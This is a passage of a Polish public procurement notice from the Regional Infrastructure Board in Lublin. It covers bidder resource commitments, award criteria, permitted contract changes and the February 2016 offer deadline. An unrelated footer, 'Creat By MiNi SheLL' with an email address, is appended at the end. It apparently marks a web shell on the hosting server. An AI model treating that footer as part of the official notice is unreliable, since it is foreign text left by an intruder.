<p>1.Jeżeli Wykonawca - potwierdzając spełnianie warunków udziału w postępowaniu - będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków - w takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia - o treści opisanej w pkt XVII ppkt 10. SIWZ - w oryginale.
Ponadto w przypadku polegania przez wykonawcę przy spełnianiu warunku wiedzy 
i doświadczenia na potencjale innego podmiotu Zamawiający w celu zabezpieczenia należytego wykonania umowy żąda udziału podmiotu posiadającego wiedzę 
i doświadczenie jako podwykonawcy robót w danym zakresie.
Zasady spełniania warunków udziału w postępowaniu w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia opisane są w pkt XII SIWZ.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy, ODPOWIADA SOLIDARNIE z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w punkcie XVII SIWZ.
Z treści załączonych dokumentów oraz oświadczeń musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił. Jeżeli Wykonawca nie wykaże spełnienia chociażby jednego z ww warunków zostanie wykluczony z postępowania o udzielenie zamówienia.
2.Zastrzeżenie informacji stanowiącej tajemnicę przedsiębiorstwa (jeżeli dotyczy) - jako zał. nr 8.
3.Pełnomocnictwo - wystawione przez Wykonawców ubiegających się wspólnie 
o udzielenie zamówienia - do reprezentacji ich w postępowaniu o udzielenie zamówienia tj. w szczególności do złożenia oferty, oświadczeń i zawiadomień albo do reprezentowania ich w postępowaniu oraz zawarcia umowy - jako zał. nr 9.
4.Jeżeli Wykonawca - wykazując spełnienie warunków udziału w postępowaniu - o których mowa w art. 22 ust. 1 ustawy prawo zamówień publicznych, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust.2b ustawy, zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym na potrzeby wykonania zamówienia żąda przedstawienia oryginału pisemnego zobowiązania tych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, ze wskazaniem zakresu zasobów innego podmiotu udostępnionych wykonawcy, sposobu ich wykorzystania, przez wykonawcę, przy wykonywaniu zamówienia, oraz iż będzie nimi dysponował w trakcie realizacji zamówienia. 
UWAGA: treść zobowiązania innego podmiotu powinna jednoznacznie określać:
kto jest wykonawcą przyjmującym zasoby,
jakie zasoby zostaną udostępnione czyli, czego konkretnie dotyczy zobowiązanie;
w jaki sposób to zobowiązanie będzie wykonane.
5.Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału 
w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia przedkłada także dokumenty  określone w pkt. XVII ppkt. 2, 4 SIWZ dotyczące tego podmiotu w zakresie i na zasadach wymaganych dla wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwaracja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)zmianę terminu realizacji zamówienia, w przypadku wstrzymania robót przez Zmawiającego z przyczyn leżących po stronie Zamawiającego 
o okres nie dłuższy niż okres wstrzymania robót,
b)zmianę terminu realizacji zamówienia jedynie w przypadku udokumentowanych opóźnień w uzyskaniu decyzji administracyjnych lub uzgodnień obligatoryjnych, które powstały pomimo należytego i terminowego działania Wykonawcy. 
c)zmianę terminu realizacji zamówienia, w przypadku wystąpienia siły wyższej (zdarzenia którego strony nie mogły przewidzieć, któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w całości lub części jego zobowiązań) lub innych okoliczności niezależnych od Wykonawcy lub których Wykonawca, przy zachowaniu należnej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonaniu przedmiotu umowy spowodowane przez osobę trzecią, o czas działania siły wyższej oraz czas potrzebny do usunięcia skutków jej działania oraz usunięcia przeszkód,
d)zmiany Podwykonawcy - zmiana podwykonawcy wymaga zgody Zamawiającego. Zamawiający zaakceptuje i wyda zgodę na zmianę podwykonawcy jeżeli otrzyma potwierdzenie rozliczenia się Wykonawcy 
z poprzednim podwykonawcą oraz dochowa procedury określonej dla zawarcia umowy o podwykonawstwo (przedłożenie projektu umowy, projektu jej zmiany, przekazanie potwierdzonej kopii). 
e)W przypadku zmiany albo rezygnacji  podmiotu, o którym mowa 
w pkt XVII. ppkt 10 SIWZ, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy z dnia 29 stycznia 2004 r. prawo zamówień publicznych (t.j. Dz. U. z 2013 r. poz. 907 
z późn. zm.), w celu wykazania spełniania warunków udziału 
w postępowaniu, o których mowa w art. 22 w/w ustawy. Wówczas Wykonawca jest zobowiązany wykazać Zamawiającemu, iż proponowany inny podmiot samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie przedmiotowego postępowania.
f)zmianę osób upoważnionych, jako przedstawicieli stron, w przypadku nieprzewidzianych zdarzeń losowych takich jak choroba, śmierć, ustanie stosunku pracy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzilublin.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury w Lublinie ul. Lipowa 1a, 20 - 020 Lublin, pokój 117 po wpłacie (przelewie) na rachunek kosztów wydruku i wysyłki  lub bez opłat ze strony www zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2016 godzina 13:00, miejsce: Rejonowy Zarząd Infrastruktury w Lublinie ul. Lipowa 1a, 20 - 020 Lublin, pokój 103 (kancelaria). Oferty nadesłane pocztą  również obowiązuje ww termin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com